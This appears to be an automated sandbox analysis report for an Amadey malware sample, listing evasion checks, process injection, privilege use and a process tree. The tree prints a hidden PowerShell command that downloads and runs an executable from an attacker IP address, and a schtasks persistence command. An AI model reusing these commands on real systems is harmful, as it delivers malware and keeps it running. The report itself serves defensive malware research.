amadey | a5b959ac59961099a0605032aad6ad96ed577cfe8283bab41acc1efc8a00a1e4

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4e34859d80.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7a9f3697b2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
23	3460	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3460	powershell.exe
916	powershell.exe
4724	powershell.exe
12880	powershell.exe
5728	powershell.exe

Downloads MZ/PE file 5 IoCs

flow	pid	Process
33	4088	rapes.exe
33	4088	rapes.exe
33	4088	rapes.exe
33	4088	rapes.exe
23	3460	powershell.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7a9f3697b2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7a9f3697b2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4e34859d80.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4e34859d80.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	A9cowK5.exe

Executes dropped EXE 8 IoCs

pid	Process
1432	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE
4088	rapes.exe
5864	e35a1c1713.exe
1348	4e34859d80.exe
3520	rapes.exe
208	A9cowK5.exe
4500	EPTwCQd.exe
4900	7a9f3697b2.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	4e34859d80.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	7a9f3697b2.exe

Loads dropped DLL 10 IoCs

pid	Process
5040	MsiExec.exe
4232	rundll32.exe
4232	rundll32.exe
4232	rundll32.exe
4232	rundll32.exe
4232	rundll32.exe
4232	rundll32.exe
4232	rundll32.exe
4232	rundll32.exe
4232	rundll32.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000400000001e4ba-17620.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
1432	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE
4088	rapes.exe
1348	4e34859d80.exe
3520	rapes.exe
4900	7a9f3697b2.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 5864 set thread context of 3196	5864	e35a1c1713.exe	108
PID 4500 set thread context of 4596	4500	EPTwCQd.exe	121

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	A9cowK5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7a9f3697b2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4e34859d80.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
12852	PING.EXE
9748	PING.EXE
8240	PING.EXE
7456	PING.EXE
4484	PING.EXE
1456	PING.EXE
4536	PING.EXE
11948	PING.EXE
10892	PING.EXE
9848	PING.EXE
12248	PING.EXE
11620	PING.EXE
10032	PING.EXE
12732	PING.EXE
10328	PING.EXE
10492	PING.EXE
4496	PING.EXE
7732	PING.EXE
12532	PING.EXE
1944	PING.EXE
9324	PING.EXE
8832	PING.EXE
5780	PING.EXE
6588	PING.EXE
10804	PING.EXE
8152	PING.EXE
11052	PING.EXE
1492	PING.EXE
9948	PING.EXE
8920	PING.EXE
7280	PING.EXE
11960	PING.EXE
3448	PING.EXE
5808	PING.EXE
6900	PING.EXE
12384	PING.EXE
8136	PING.EXE
7940	PING.EXE
7912	PING.EXE
4440	PING.EXE
9964	PING.EXE
7240	PING.EXE
12404	PING.EXE
10404	PING.EXE
13136	PING.EXE
11344	PING.EXE
8512	PING.EXE
7636	PING.EXE
12668	PING.EXE
6264	PING.EXE
9420	PING.EXE
8620	PING.EXE
11776	PING.EXE
10856	PING.EXE
7824	PING.EXE
6356	PING.EXE
12516	PING.EXE
856	PING.EXE
6164	PING.EXE
9604	PING.EXE
12264	PING.EXE
3452	PING.EXE
4524	PING.EXE
11372	PING.EXE

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000d433842ca64169410000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000d433842c0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900d433842c000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dd433842c000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000d433842c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
4836	taskkill.exe
7140	taskkill.exe
2592	taskkill.exe
4360	taskkill.exe
4916	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
13072	reg.exe
13056	reg.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

pid	Process
10220	PING.EXE
8076	PING.EXE
6564	PING.EXE
6244	PING.EXE
11176	PING.EXE
11924	PING.EXE
9508	PING.EXE
7732	PING.EXE
7540	PING.EXE
7280	PING.EXE
11440	PING.EXE
4496	PING.EXE
13136	PING.EXE
11700	PING.EXE
8328	PING.EXE
7824	PING.EXE
10472	PING.EXE
10856	PING.EXE
10904	PING.EXE
3584	PING.EXE
10328	PING.EXE
9748	PING.EXE
8692	PING.EXE
7912	PING.EXE
7368	PING.EXE
12248	PING.EXE
8800	PING.EXE
1800	PING.EXE
11612	PING.EXE
10972	PING.EXE
11696	PING.EXE
12884	PING.EXE
11660	PING.EXE
11532	PING.EXE
6416	PING.EXE
11372	PING.EXE
10400	PING.EXE
8052	PING.EXE
6172	PING.EXE
6160	PING.EXE
12244	PING.EXE
10492	PING.EXE
6920	PING.EXE
4484	PING.EXE
5004	PING.EXE
12384	PING.EXE
11280	PING.EXE
4524	PING.EXE
6676	PING.EXE
9012	PING.EXE
8204	PING.EXE
12536	PING.EXE
12416	PING.EXE
7320	PING.EXE
11160	PING.EXE
12856	PING.EXE
8620	PING.EXE
12164	PING.EXE
6056	PING.EXE
9848	PING.EXE
7624	PING.EXE
11584	PING.EXE
11092	PING.EXE
7992	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1976	schtasks.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
3460	powershell.exe
3460	powershell.exe
1432	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE
1432	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE
4088	rapes.exe
4088	rapes.exe
3196	MSBuild.exe
3196	MSBuild.exe
3196	MSBuild.exe
3196	MSBuild.exe
1348	4e34859d80.exe
1348	4e34859d80.exe
1348	4e34859d80.exe
1348	4e34859d80.exe
1348	4e34859d80.exe
1348	4e34859d80.exe
3520	rapes.exe
3520	rapes.exe
4596	MSBuild.exe
4596	MSBuild.exe
4596	MSBuild.exe
4596	MSBuild.exe
4900	7a9f3697b2.exe
4900	7a9f3697b2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeDebugPrivilege	208	A9cowK5.exe
Token: SeShutdownPrivilege	1508	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1508	msiexec.exe
Token: SeSecurityPrivilege	6128	msiexec.exe
Token: SeCreateTokenPrivilege	1508	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1508	msiexec.exe
Token: SeLockMemoryPrivilege	1508	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1508	msiexec.exe
Token: SeMachineAccountPrivilege	1508	msiexec.exe
Token: SeTcbPrivilege	1508	msiexec.exe
Token: SeSecurityPrivilege	1508	msiexec.exe
Token: SeTakeOwnershipPrivilege	1508	msiexec.exe
Token: SeLoadDriverPrivilege	1508	msiexec.exe
Token: SeSystemProfilePrivilege	1508	msiexec.exe
Token: SeSystemtimePrivilege	1508	msiexec.exe
Token: SeProfSingleProcessPrivilege	1508	msiexec.exe
Token: SeIncBasePriorityPrivilege	1508	msiexec.exe
Token: SeCreatePagefilePrivilege	1508	msiexec.exe
Token: SeCreatePermanentPrivilege	1508	msiexec.exe
Token: SeBackupPrivilege	1508	msiexec.exe
Token: SeRestorePrivilege	1508	msiexec.exe
Token: SeShutdownPrivilege	1508	msiexec.exe
Token: SeDebugPrivilege	1508	msiexec.exe
Token: SeAuditPrivilege	1508	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1508	msiexec.exe
Token: SeChangeNotifyPrivilege	1508	msiexec.exe
Token: SeRemoteShutdownPrivilege	1508	msiexec.exe
Token: SeUndockPrivilege	1508	msiexec.exe
Token: SeSyncAgentPrivilege	1508	msiexec.exe
Token: SeEnableDelegationPrivilege	1508	msiexec.exe
Token: SeManageVolumePrivilege	1508	msiexec.exe
Token: SeImpersonatePrivilege	1508	msiexec.exe
Token: SeCreateGlobalPrivilege	1508	msiexec.exe
Token: SeCreateTokenPrivilege	1508	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1508	msiexec.exe
Token: SeLockMemoryPrivilege	1508	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1508	msiexec.exe
Token: SeMachineAccountPrivilege	1508	msiexec.exe
Token: SeTcbPrivilege	1508	msiexec.exe
Token: SeSecurityPrivilege	1508	msiexec.exe
Token: SeTakeOwnershipPrivilege	1508	msiexec.exe
Token: SeLoadDriverPrivilege	1508	msiexec.exe
Token: SeSystemProfilePrivilege	1508	msiexec.exe
Token: SeSystemtimePrivilege	1508	msiexec.exe
Token: SeProfSingleProcessPrivilege	1508	msiexec.exe
Token: SeIncBasePriorityPrivilege	1508	msiexec.exe
Token: SeCreatePagefilePrivilege	1508	msiexec.exe
Token: SeCreatePermanentPrivilege	1508	msiexec.exe
Token: SeBackupPrivilege	1508	msiexec.exe
Token: SeRestorePrivilege	1508	msiexec.exe
Token: SeShutdownPrivilege	1508	msiexec.exe
Token: SeDebugPrivilege	1508	msiexec.exe
Token: SeAuditPrivilege	1508	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1508	msiexec.exe
Token: SeChangeNotifyPrivilege	1508	msiexec.exe
Token: SeRemoteShutdownPrivilege	1508	msiexec.exe
Token: SeUndockPrivilege	1508	msiexec.exe
Token: SeSyncAgentPrivilege	1508	msiexec.exe
Token: SeEnableDelegationPrivilege	1508	msiexec.exe
Token: SeManageVolumePrivilege	1508	msiexec.exe
Token: SeImpersonatePrivilege	1508	msiexec.exe
Token: SeCreateGlobalPrivilege	1508	msiexec.exe
Token: SeCreateTokenPrivilege	1508	msiexec.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
5524	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5524	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5524	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1508	msiexec.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
5524	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5524	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5524	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 5524 wrote to memory of 1688	5524	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 5524 wrote to memory of 1688	5524	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 5524 wrote to memory of 1688	5524	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 5524 wrote to memory of 4568	5524	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 5524 wrote to memory of 4568	5524	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 5524 wrote to memory of 4568	5524	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 1688 wrote to memory of 1976	1688	cmd.exe	91
PID 1688 wrote to memory of 1976	1688	cmd.exe	91
PID 1688 wrote to memory of 1976	1688	cmd.exe	91
PID 4568 wrote to memory of 3460	4568	mshta.exe	94
PID 4568 wrote to memory of 3460	4568	mshta.exe	94
PID 4568 wrote to memory of 3460	4568	mshta.exe	94
PID 3460 wrote to memory of 1432	3460	powershell.exe	101
PID 3460 wrote to memory of 1432	3460	powershell.exe	101
PID 3460 wrote to memory of 1432	3460	powershell.exe	101
PID 1432 wrote to memory of 4088	1432	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE	102
PID 1432 wrote to memory of 4088	1432	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE	102
PID 1432 wrote to memory of 4088	1432	TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE	102
PID 4088 wrote to memory of 5864	4088	rapes.exe	106
PID 4088 wrote to memory of 5864	4088	rapes.exe	106
PID 5864 wrote to memory of 3196	5864	e35a1c1713.exe	108
PID 5864 wrote to memory of 3196	5864	e35a1c1713.exe	108
PID 5864 wrote to memory of 3196	5864	e35a1c1713.exe	108
PID 5864 wrote to memory of 3196	5864	e35a1c1713.exe	108
PID 5864 wrote to memory of 3196	5864	e35a1c1713.exe	108
PID 5864 wrote to memory of 3196	5864	e35a1c1713.exe	108
PID 5864 wrote to memory of 3196	5864	e35a1c1713.exe	108
PID 5864 wrote to memory of 3196	5864	e35a1c1713.exe	108
PID 5864 wrote to memory of 3196	5864	e35a1c1713.exe	108
PID 4088 wrote to memory of 1348	4088	rapes.exe	109
PID 4088 wrote to memory of 1348	4088	rapes.exe	109
PID 4088 wrote to memory of 1348	4088	rapes.exe	109
PID 4088 wrote to memory of 208	4088	rapes.exe	111
PID 4088 wrote to memory of 208	4088	rapes.exe	111
PID 4088 wrote to memory of 208	4088	rapes.exe	111
PID 208 wrote to memory of 1508	208	A9cowK5.exe	112
PID 208 wrote to memory of 1508	208	A9cowK5.exe	112
PID 208 wrote to memory of 1508	208	A9cowK5.exe	112
PID 6128 wrote to memory of 5040	6128	msiexec.exe	116
PID 6128 wrote to memory of 5040	6128	msiexec.exe	116
PID 6128 wrote to memory of 5040	6128	msiexec.exe	116
PID 5040 wrote to memory of 4232	5040	MsiExec.exe	117
PID 5040 wrote to memory of 4232	5040	MsiExec.exe	117
PID 5040 wrote to memory of 4232	5040	MsiExec.exe	117
PID 4088 wrote to memory of 4500	4088	rapes.exe	120
PID 4088 wrote to memory of 4500	4088	rapes.exe	120
PID 4500 wrote to memory of 4596	4500	EPTwCQd.exe	121
PID 4500 wrote to memory of 4596	4500	EPTwCQd.exe	121
PID 4500 wrote to memory of 4596	4500	EPTwCQd.exe	121
PID 4500 wrote to memory of 4596	4500	EPTwCQd.exe	121
PID 4500 wrote to memory of 4596	4500	EPTwCQd.exe	121
PID 4500 wrote to memory of 4596	4500	EPTwCQd.exe	121
PID 4500 wrote to memory of 4596	4500	EPTwCQd.exe	121
PID 4500 wrote to memory of 4596	4500	EPTwCQd.exe	121
PID 4500 wrote to memory of 4596	4500	EPTwCQd.exe	121
PID 4088 wrote to memory of 4900	4088	rapes.exe	124
PID 4088 wrote to memory of 4900	4088	rapes.exe	124
PID 4088 wrote to memory of 4900	4088	rapes.exe	124

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5524
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn ySgTlmaKy2s /tr "mshta C:\Users\Admin\AppData\Local\Temp\RXRQnOs6R.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1688
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn ySgTlmaKy2s /tr "mshta C:\Users\Admin\AppData\Local\Temp\RXRQnOs6R.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1976
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\RXRQnOs6R.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4568
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3460
  - - C:\Users\Admin\AppData\Local\TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE
      "C:\Users\Admin\AppData\Local\TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1432
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4088
      - C:\Users\Admin\AppData\Local\Temp\10381530101\e35a1c1713.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381530101\e35a1c1713.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:5864
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3196
      - C:\Users\Admin\AppData\Local\Temp\10381540101\4e34859d80.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381540101\4e34859d80.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1348
      - C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:208
